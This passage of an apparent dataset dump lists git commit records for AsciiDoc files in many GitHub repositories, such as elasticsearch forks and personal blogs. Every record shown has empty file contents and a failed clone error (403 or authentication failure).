lin\/elasticsearch,polyfractal\/elasticsearch,fernandozhu\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,ivansun1010\/elasticsearch,martinstuga\/elasticsearch,jchampion\/elasticsearch,rlugojr\/elasticsearch,diendt\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,mapr\/elasticsearch,spiegela\/elasticsearch,camilojd\/elasticsearch,rhoml\/elasticsearch,mikemccand\/elasticsearch,kaneshin\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,Helen-Zhao\/elasticsearch,naveenhooda2000\/elasticsearch,winstonewert\/elasticsearch,snikch\/elasticsearch,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,elasticdog\/elasticsearch,yynil\/elasticsearch,davidvgalbraith\/elasticsearch,nomoa\/elasticsearch,ESamir\/elasticsearch,mortonsykes\/elasticsearch,JervyShi\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,camilojd\/elasticsearch,avikurapati\/elasticsearch,polyfractal\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,polyfractal\/elasticsearch,henakamaMSFT\/elasticsearch,markwalkom\/elasticsearch,jpountz\/elasticsearch,sreeramjayan\/elasticsearch,mmaracic\/elasticsearch,zkidkid\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,qwerty4030\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,brandonkearby\/elasticsearch,liweinan0423\/elasticsearch,sneivandt\/elasticsearch,mikemccand\/elasticsearch,JervyShi\/elasticsearch,sneivandt\/elasticsearch,mmaracic\/elasticsearch,mikemccand\/elasticsearch,gfyoung\/elasticsearch,tebriel\/elasticsearch,palecur\/elasticsearch,tebriel\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,a2lin\/elasticsearch,clintongormley\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elasticassandra,mohit\/elasticsearch,episerver\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,MaineC\/elasticsearch,C-Bish\/elasticsearch,alexshadow007\/elasticsearch,mikemccand\/elasticsearch,trangvh\/elasticsearch,shreejay\/elasticsearch,yanjunh\/elasticsearch,jchampion\/elasticsearch,mortonsykes\/elasticsearch,nomoa\/elasticsearch,fforbeck\/elasticsearch,zkidkid\/elasticsearch,mmaracic\/elasticsearch,andrejserafim\/elasticsearch,ESamir\/elasticsearch,girirajsharma\/elasticsearch,camilojd\/elasticsearch,liweinan0423\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,lks21c\/elasticsearch,nilabhsagar\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,vroyer\/elassandra,jpountz\/elasticsearch,davidvgalbraith\/elasticsearch,vroyer\/elasticassandra,dpursehouse\/elasticsearch,dongjoon-hyun\/elasticsearch,AndreKR\/elasticsearch,nomoa\/elasticsearch,jimczi\/elasticsearch,polyfractal\/elasticsearch,F0lha\/elasticsearch,i-am-Nathan\/elasticsearch,rmuir\/elasticsearch,episerver\/elasticsearch,MisterAndersen\/elasticsearch,jpountz\/elasticsearch,jbertouch\/elasticsearch,MisterAndersen\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,brandonkearby\/elasticsearch,polyfractal\/elasticsearch,nilabhsagar\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,coding0011\/elasticsearch,glefloch\/elasticsearch,rhoml\/elasticsearch,scottsom\/elasticsearch,ivansun1010\/elasticsearch,ZTE-PaaS\/elasticsearch,yanjunh\/elasticsearch,fforbeck\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,geidies\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasti
csearch,diendt\/elasticsearch,snikch\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,MisterAndersen\/elasticsearch,wangtuo\/elasticsearch,sreeramjayan\/elasticsearch,winstonewert\/elasticsearch,yynil\/elasticsearch,brandonkearby\/elasticsearch,a2lin\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,JackyMai\/elasticsearch,trangvh\/elasticsearch,vroyer\/elasticassandra,strapdata\/elassandra5-rc,elasticdog\/elasticsearch,kalimatas\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,ESamir\/elasticsearch,Helen-Zhao\/elasticsearch,fernandozhu\/elasticsearch,StefanGor\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,kalimatas\/elasticsearch,nazarewk\/elasticsearch,mapr\/elasticsearch,ESamir\/elasticsearch,ZTE-PaaS\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,Shepard1212\/elasticsearch,davidvgalbraith\/elasticsearch,GlenRSmith\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,jbertouch\/elasticsearch,AndreKR\/elasticsearch,fernandozhu\/elasticsearch,robin13\/elasticsearch,artnowo\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,LewayneNaidoo\/elasticsearch,strapdata\/elassandra5-rc,LeoYao\/elasticsearch,robin13\/elasticsearch,jprante\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,mohit\/elasticsearch,rmuir\/elasticsearch,jprante\/elasticsearch,wangtuo\/elasticsearch,markharwood\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,girirajsharma\/elasticsearch,awislowski\/elasticsearch,martinstuga\/elasticsearch,JackyMai\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,clintongormley\/elasticsearch,strapdata\/elassandra5-rc,diendt\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,geidies\/elasticsearch,a2lin\/elasticsearch,tebriel\/elasticsearch,Stacey-Gammon\/elasticsearch,episerver\/elasticsearch,markharwood\/elasticsearch,rlugojr\/elasticsearch,umeshdangat\/elasticsearch,fernandozhu\/elasticsearch,jchampion\/elasticsearch,wuranbo\/elasticsearch,jpountz\/elasticsearch,elasticdog\/elasticsearch,cwurm\/elasticsearch,ricardocerq\/elasticsearch,girirajsharma\/elasticsearch,clintongormley\/elasticsearch,andrejserafim\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,F0lha\/elasticsearch,artnowo\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,rmuir\/elasticsearch,rajanm\/elasticsearch,tebriel\/elasticsearch,JSCooke\/elasticsearch,ESamir\/elasticsearch,Stacey-Gammon\/elasticsearch,scottsom\/elasticsearch,clintongormley\/elasticsearch,s1monw\/elasticsearch,gmarz\/elasticsearch,xuzha\/elasticsearch,masaruh\/elasticsearch,kaneshin\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra,alexshadow007\/elasticsearch,a2lin\/elasticsearch,ZTE-PaaS\/elasticsearch,diendt\/elasticsearch,girirajsharma\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,jpountz\/elasticsearch,F0lha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,snikch\/elasticsearch,snikch\/elasticsearch,mohit\/elasticsearch,LewayneNaidoo\/elasticsearch,tebriel\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,girirajsharma\/elasticsearch,dongjoon-hyun\/elasticsearch,sreeramjayan\/elasticsearch,jimczi\/elasticsearch,markharwood\/elasticsearch,yanjunh\/elasticsearch,lks21c\/el
asticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,ESamir\/elasticsearch,JackyMai\/elasticsearch,jbertouch\/elasticsearch,xuzha\/elasticsearch,jchampion\/elasticsearch,rmuir\/elasticsearch,ivansun1010\/elasticsearch,elasticdog\/elasticsearch,ivansun1010\/elasticsearch,gingerwizard\/elasticsearch,jpountz\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,jbertouch\/elasticsearch,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,palecur\/elasticsearch,sneivandt\/elasticsearch","old_file":"docs\/reference\/search\/field-stats.asciidoc","new_file":"docs\/reference\/search\/field-stats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec25a85c76cc9bba6ae6c104d495668c54967c4a","subject":"link to final releases","message":"link to final releases\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.1.adoc","new_file":"download\/releaseNotes\/releaseNotes6.1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9de96386ac9e7dddacc7fde22542d5d95119eb48","subject":"Update 2016-09-16-Profiles.adoc","message":"Update 2016-09-16-Profiles.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-16-Profiles.adoc","new_file":"_posts\/2016-09-16-Profiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cbcd5569dfe38de699d61fd0ecc4dfbf8f04f26","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764686292ef605c9568c34a1e7558636812f3a3d","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 
2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb12f84183d31b00b7746e974c6535a37dad23de","subject":"y2b create post The Worst Gadget EVER On Unbox Therapy...","message":"y2b create post The Worst Gadget EVER On Unbox Therapy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-19-The%20Worst%20Gadget%20EVER%20On%20Unbox%20Therapy....adoc","new_file":"_posts\/2018-02-19-The%20Worst%20Gadget%20EVER%20On%20Unbox%20Therapy....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f9255763279d88b33d66b11911e0c9ab86b1cc9","subject":"Update 2015-07-16-Bug-Defense.adoc","message":"Update 2015-07-16-Bug-Defense.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-Bug-Defense.adoc","new_file":"_posts\/2015-07-16-Bug-Defense.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d426e09ab14ab55e5dbf207caad0105be1adc2","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58713cbe1c87d95868abde95c5e563003def59a3","subject":"Update 2016-09-11-Math-Proofs.adoc","message":"Update 2016-09-11-Math-Proofs.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-09-11-Math-Proofs.adoc","new_file":"_posts\/2016-09-11-Math-Proofs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"043c9ffa8589f368b30c2bb8ba203edbeb510471","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 
2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"145ee104e5d2bad517a891b5468b2cdfbd56da95","subject":"Update Two_Factor_PAM_Configuration.adoc","message":"Update Two_Factor_PAM_Configuration.adoc","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_file":"doc\/Two_Factor_PAM_Configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a9b82c7f31156d18070a03c44d2b82d30c5f1ba1","subject":"Finished move constructor section (references pending)","message":"Finished move constructor section (references pending)\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5df5f21b83a32d1176955eef1c86dc027f6d6f3d","subject":"HashMap","message":"HashMap\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"HashMap.adoc","new_file":"HashMap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df44895d2df255814aaaee584a70df9f1de26a33","subject":"y2b create post iPhone 7 Earpods - Are These Legit?","message":"y2b create post iPhone 7 Earpods - Are These Legit?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-17-iPhone-7-Earpods--Are-These-Legit.adoc","new_file":"_posts\/2016-08-17-iPhone-7-Earpods--Are-These-Legit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdaa3e7031dbdf57d0d44b08a20517b89be18585","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"67a6e870f133cd1e5e066a147e1c6a0e99ed5bda","subject":"Update 2016-01-04-Java-8-in-action.adoc","message":"Update 2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"db7a135432039c863fdbfc63c19a30a2e0116636","subject":"Update 2018-08-03-Docker-Artifactory-Migration.adoc","message":"Update 2018-08-03-Docker-Artifactory-Migration.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-08-03-Docker-Artifactory-Migration.adoc","new_file":"_posts\/2018-08-03-Docker-Artifactory-Migration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d959d9f4b5d6348e7aa2763dbb94e5d5c9abd93b","subject":"y2b create post The iPhone Lighter Case?","message":"y2b create post The iPhone Lighter Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-05-The-iPhone-Lighter-Case.adoc","new_file":"_posts\/2015-11-05-The-iPhone-Lighter-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e206eae1c85f8631ada43c3c787c9315f3cbef0b","subject":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","message":"Update 2017-06-05-requests-via-ntlm-proxy.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_file":"_posts\/2017-06-05-requests-via-ntlm-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aae6c48a04eda4db4519fbf21dc3234baae6b885","subject":"Delete the file at '2012-12-1-Frisbeens-historie.adoc'","message":"Delete the file at '2012-12-1-Frisbeens-historie.adoc'","repos":"discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk,discimport\/blog.discimport.dk","old_file":"2012-12-1-Frisbeens-historie.adoc","new_file":"2012-12-1-Frisbeens-historie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/discimport\/blog.discimport.dk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7603e6e444e16e564c540ee0a6dc36280517d55c","subject":"Update 2018-04-29.adoc","message":"Update 2018-04-29.adoc","repos":"hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io,hytgbn\/hytgbn.github.io","old_file":"_posts\/2018-04-29.adoc","new_file":"_posts\/2018-04-29.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hytgbn\/hytgbn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e133978ec079cbc801fabef752a42fe538b3132b","subject":"Update 2015-06-26-Hello-World.adoc","message":"Update 2015-06-26-Hello-World.adoc","repos":"gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io","old_file":"_posts\/2015-06-26-Hello-World.adoc","new_file":"_posts\/2015-06-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdbremer\/gerdbremer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d847df73751df93e18d1fc3951173b738d22ad10","subject":"Update 2016-07-15-Hello-world.adoc","message":"Update 2016-07-15-Hello-world.adoc","repos":"minditech\/minditech.github.io,minditech\/minditech.github.io,minditech\/minditech.github.io,minditech\/minditech.github.io","old_file":"_posts\/2016-07-15-Hello-world.adoc","new_file":"_posts\/2016-07-15-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minditech\/minditech.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32b8f92c4901484cacf9645549ab2b38ea5e8f9f","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"346b6447fed0726045d80454b1a7c159be45175b","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/19\/deref.adoc","new_file":"content\/news\/2021\/11\/19\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"84898b72962b5cee14010a53d08ecf04af223073","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3d7271183138caa7c138e467af6005d37d806d85","subject":"Create CHANGELOG.adoc","message":"Create CHANGELOG.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"370343ecf0bb2fccb33a4f1ddb41ec650118f1a9","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d64c8a6809cf26d6de51f12355cc3373981fa81c","subject":"Update 2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","message":"Update 2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","new_file":"_posts\/2016-01-19-Como-de-facil-es-suplantar-una-identidad-Hacking-con-PHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8637632c31a126f97ad8513e237a25c32719df7d","subject":":memo: mkdocs-material","message":":memo: mkdocs-material\n","repos":"syon\/refills","old_file":"src\/refills\/github-pages\/mkdocs-material.adoc","new_file":"src\/refills\/github-pages\/mkdocs-material.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69260250b46f6d53fcc1b23e55270bd0d082925d","subject":"Update 2015-05-12-First-Post.adoc","message":"Update 2015-05-12-First-Post.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2015-05-12-First-Post.adoc","new_file":"_posts\/2015-05-12-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mubix\/blog.room362.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c9b1779df13c28c8165ef99a13a9adba438194c","subject":"Update 2016-08-08-2016-08-07.adoc","message":"Update 2016-08-08-2016-08-07.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-08-2016-08-07.adoc","new_file":"_posts\/2016-08-08-2016-08-07.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"017e5bf2152d1101512bcbac8690e14409f0658c","subject":"Update 
2017-01-01-Blog-Title.adoc","message":"Update 2017-01-01-Blog-Title.adoc","repos":"mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io","old_file":"_posts\/2017-01-01-Blog-Title.adoc","new_file":"_posts\/2017-01-01-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mmhchan\/mmhchan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cb5342146ba570308184514c36a8aa6d7ebc246","subject":"Update 2018-04-15-Ego-search.adoc","message":"Update 2018-04-15-Ego-search.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-15-Ego-search.adoc","new_file":"_posts\/2018-04-15-Ego-search.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f12fc4e14e67f54bf2710dc01a8dd9101920d538","subject":"y2b create post Google+ Invites for Subscribers!","message":"y2b create post Google+ Invites for 